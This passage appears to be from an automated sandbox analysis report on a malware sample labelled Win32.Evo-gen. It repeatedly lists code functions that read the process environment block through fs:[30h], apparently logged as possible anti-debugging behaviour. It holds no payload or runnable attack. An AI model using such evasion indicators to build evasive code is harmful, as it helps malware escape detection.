      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov ecx, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov ecx, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov ecx, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov ecx, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov ecx, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov ecx, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C60 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D839C98 mov ecx, dword ptr fs:[00000030h]5_2_1D839C98
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D839C98 mov eax, dword ptr fs:[00000030h]5_2_1D839C98
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D839C98 mov eax, dword ptr fs:[00000030h]5_2_1D839C98
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D839C98 mov eax, dword ptr fs:[00000030h]5_2_1D839C98
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78DC40 mov eax, dword ptr fs:[00000030h]5_2_1D78DC40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C40 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C4C3D mov eax, dword ptr fs:[00000030h]5_2_1D7C4C3D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D788C3D mov eax, dword ptr fs:[00000030h]5_2_1D788C3D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D815CD0 mov eax, dword ptr fs:[00000030h]5_2_1D815CD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D822CD0 mov eax, dword ptr fs:[00000030h]5_2_1D822CD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D822CD0 mov eax, dword ptr fs:[00000030h]5_2_1D822CD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D822CD0 mov eax, dword ptr fs:[00000030h]5_2_1D822CD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D864CD2 mov eax, dword ptr fs:[00000030h]5_2_1D864CD2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D823CD4 mov eax, dword ptr fs:[00000030h]5_2_1D823CD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D823CD4 mov eax, dword ptr fs:[00000030h]5_2_1D823CD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D823CD4 mov ecx, dword ptr fs:[00000030h]5_2_1D823CD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D823CD4 mov eax, dword ptr fs:[00000030h]5_2_1D823CD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D823CD4 mov eax, dword ptr fs:[00000030h]5_2_1D823CD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A3C20 mov eax, dword ptr fs:[00000030h]5_2_1D7A3C20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7AAC20 mov eax, dword ptr fs:[00000030h]5_2_1D7AAC20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7AAC20 mov eax, dword ptr fs:[00000030h]5_2_1D7AAC20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7AAC20 mov eax, dword ptr fs:[00000030h]5_2_1D7AAC20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D827CE8 mov eax, dword ptr fs:[00000030h]5_2_1D827CE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C2C10 mov eax, dword ptr fs:[00000030h]5_2_1D7C2C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C2C10 mov eax, dword ptr fs:[00000030h]5_2_1D7C2C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C2C10 mov eax, dword ptr fs:[00000030h]5_2_1D7C2C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C2C10 mov eax, dword ptr fs:[00000030h]5_2_1D7C2C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D810CEE mov eax, dword ptr fs:[00000030h]5_2_1D810CEE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80CCF0 mov ecx, dword ptr fs:[00000030h]5_2_1D80CCF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BECF3 mov eax, dword ptr fs:[00000030h]5_2_1D7BECF3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BECF3 mov eax, dword ptr fs:[00000030h]5_2_1D7BECF3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D787CF1 mov eax, dword ptr fs:[00000030h]5_2_1D787CF1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D793CF0 mov eax, dword ptr fs:[00000030h]5_2_1D793CF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D793CF0 mov eax, dword ptr fs:[00000030h]5_2_1D793CF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7B8CDF mov eax, dword ptr fs:[00000030h]5_2_1D7B8CDF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7B8CDF mov eax, dword ptr fs:[00000030h]5_2_1D7B8CDF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ADCD1 mov eax, dword ptr fs:[00000030h]5_2_1D7ADCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ADCD1 mov eax, dword ptr fs:[00000030h]5_2_1D7ADCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ADCD1 mov eax, dword ptr fs:[00000030h]5_2_1D7ADCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CCCD1 mov ecx, dword ptr fs:[00000030h]5_2_1D7CCCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CCCD1 mov eax, dword ptr fs:[00000030h]5_2_1D7CCCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CCCD1 mov eax, dword ptr fs:[00000030h]5_2_1D7CCCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D79FCC9 mov eax, dword ptr fs:[00000030h]5_2_1D79FCC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C9CCF mov eax, dword ptr fs:[00000030h]5_2_1D7C9CCF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D786CC0 mov eax, dword ptr fs:[00000030h]5_2_1D786CC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D786CC0 mov eax, dword ptr fs:[00000030h]5_2_1D786CC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D786CC0 mov eax, dword ptr fs:[00000030h]5_2_1D786CC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D827C38 mov eax, dword ptr fs:[00000030h]5_2_1D827C38
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C6CC0 mov eax, dword ptr fs:[00000030h]5_2_1D7C6CC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D855C38 mov eax, dword ptr fs:[00000030h]5_2_1D855C38
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D855C38 mov ecx, dword ptr fs:[00000030h]5_2_1D855C38
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D813C57 mov eax, dword ptr fs:[00000030h]5_2_1D813C57
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D864C59 mov eax, dword ptr fs:[00000030h]5_2_1D864C59
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D797C95 mov eax, dword ptr fs:[00000030h]5_2_1D797C95
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D797C95 mov eax, dword ptr fs:[00000030h]5_2_1D797C95
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D787C85 mov eax, dword ptr fs:[00000030h]5_2_1D787C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D787C85 mov eax, dword ptr fs:[00000030h]5_2_1D787C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D787C85 mov eax, dword ptr fs:[00000030h]5_2_1D787C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D787C85 mov eax, dword ptr fs:[00000030h]5_2_1D787C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D787C85 mov eax, dword ptr fs:[00000030h]5_2_1D787C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78EF79 mov eax, dword ptr fs:[00000030h]5_2_1D78EF79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78EF79 mov eax, dword ptr fs:[00000030h]5_2_1D78EF79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78EF79 mov eax, dword ptr fs:[00000030h]5_2_1D78EF79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78BF70 mov eax, dword ptr fs:[00000030h]5_2_1D78BF70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D791F70 mov eax, dword ptr fs:[00000030h]5_2_1D791F70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BAF72 mov eax, dword ptr fs:[00000030h]5_2_1D7BAF72
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D818F8B mov eax, dword ptr fs:[00000030h]5_2_1D818F8B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D818F8B mov eax, dword ptr fs:[00000030h]5_2_1D818F8B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D818F8B mov eax, dword ptr fs:[00000030h]5_2_1D818F8B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7E6F70 mov eax, dword ptr fs:[00000030h]5_2_1D7E6F70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78FF30 mov edi, dword ptr fs:[00000030h]5_2_1D78FF30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D811FC9 mov eax, dword ptr fs:[00000030h]5_2_1D811FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ADF36 mov eax, dword ptr fs:[00000030h]5_2_1D7ADF36
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ADF36 mov eax, dword ptr fs:[00000030h]5_2_1D7ADF36
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ADF36 mov eax, dword ptr fs:[00000030h]5_2_1D7ADF36
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ADF36 mov eax, dword ptr fs:[00000030h]5_2_1D7ADF36
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84EFD3 mov eax, dword ptr fs:[00000030h]5_2_1D84EFD3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FFDC mov eax, dword ptr fs:[00000030h]5_2_1D80FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FFDC mov eax, dword ptr fs:[00000030h]5_2_1D80FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FFDC mov eax, dword ptr fs:[00000030h]5_2_1D80FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FFDC mov ecx, dword ptr fs:[00000030h]5_2_1D80FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FFDC mov eax, dword ptr fs:[00000030h]5_2_1D80FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FFDC mov eax, dword ptr fs:[00000030h]5_2_1D80FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D0F16 mov eax, dword ptr fs:[00000030h]5_2_1D7D0F16
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D0F16 mov eax, dword ptr fs:[00000030h]5_2_1D7D0F16
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D0F16 mov eax, dword ptr fs:[00000030h]5_2_1D7D0F16
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7D0F16 mov eax, dword ptr fs:[00000030h]5_2_1D7D0F16
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CBF0C mov eax, dword ptr fs:[00000030h]5_2_1D7CBF0C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CBF0C mov eax, dword ptr fs:[00000030h]5_2_1D7CBF0C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7CBF0C mov eax, dword ptr fs:[00000030h]5_2_1D7CBF0C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D864FFF mov eax, dword ptr fs:[00000030h]5_2_1D864FFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ACF00 mov eax, dword ptr fs:[00000030h]5_2_1D7ACF00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7ACF00 mov eax, dword ptr fs:[00000030h]5_2_1D7ACF00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7B8FFB mov eax, dword ptr fs:[00000030h]5_2_1D7B8FFB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FF03 mov eax, dword ptr fs:[00000030h]5_2_1D80FF03
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FF03 mov eax, dword ptr fs:[00000030h]5_2_1D80FF03
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D80FF03 mov eax, dword ptr fs:[00000030h]5_2_1D80FF03
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov ecx, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov ecx, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov ecx, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov ecx, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7A6FE0 mov eax, dword ptr fs:[00000030h]5_2_1D7A6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D864F1D mov eax, dword ptr fs:[00000030h]5_2_1D864F1D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D789FD0 mov eax, dword ptr fs:[00000030h]5_2_1D789FD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D78BFC0 mov eax, dword ptr fs:[00000030h]5_2_1D78BFC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D818F3C mov eax, dword ptr fs:[00000030h]5_2_1D818F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D818F3C mov eax, dword ptr fs:[00000030h]5_2_1D818F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D818F3C mov ecx, dword ptr fs:[00000030h]5_2_1D818F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D818F3C mov ecx, dword ptr fs:[00000030h]5_2_1D818F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7C8FBC mov eax, dword ptr fs:[00000030h]5_2_1D7C8FBC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D84BF4D mov eax, dword ptr fs:[00000030h]5_2_1D84BF4D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BCFB0 mov eax, dword ptr fs:[00000030h]5_2_1D7BCFB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D7BCFB0 mov eax, dword ptr fs:[00000030h]5_2_1D7BCFB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D794FB6 mov eax, dword ptr fs:[00000030h]5_2_1D794FB6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exeCode function: 5_2_1D791FAA mov eax, dword ptr fs:[00000030h]5_2_1D791FAA
